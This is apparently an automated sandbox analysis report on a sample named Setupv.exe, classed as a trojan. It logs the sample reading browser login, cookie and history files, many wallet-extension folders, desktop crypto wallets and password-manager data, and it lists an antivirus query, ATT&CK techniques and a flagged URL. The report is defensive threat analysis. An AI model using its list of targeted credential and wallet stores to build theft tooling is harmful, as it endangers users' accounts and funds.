        Source: Setupv.exe, 00000000.00000003.1810264932.0000000003AAC000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818067077.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810403122.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1856112648.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1817844215.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\Setupv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: Setupv.exe PID: 7840, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\ArmoryJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\DashCore\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\1PasswordJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\NordPassJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\BitwardenJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: Setupv.exe PID: 7840, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		2
        OS Credential Dumping        		221
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		21
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		LSASS Memory21
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol31
        Data from Local System        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares2
        Clipboard Data        		3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture114
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Setupv.exe28%ReversingLabsWin32.Trojan.Generic
        Setupv.exe28%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://cartograhphy.top:443/ixauaD(100%Avira URL Cloudmalware
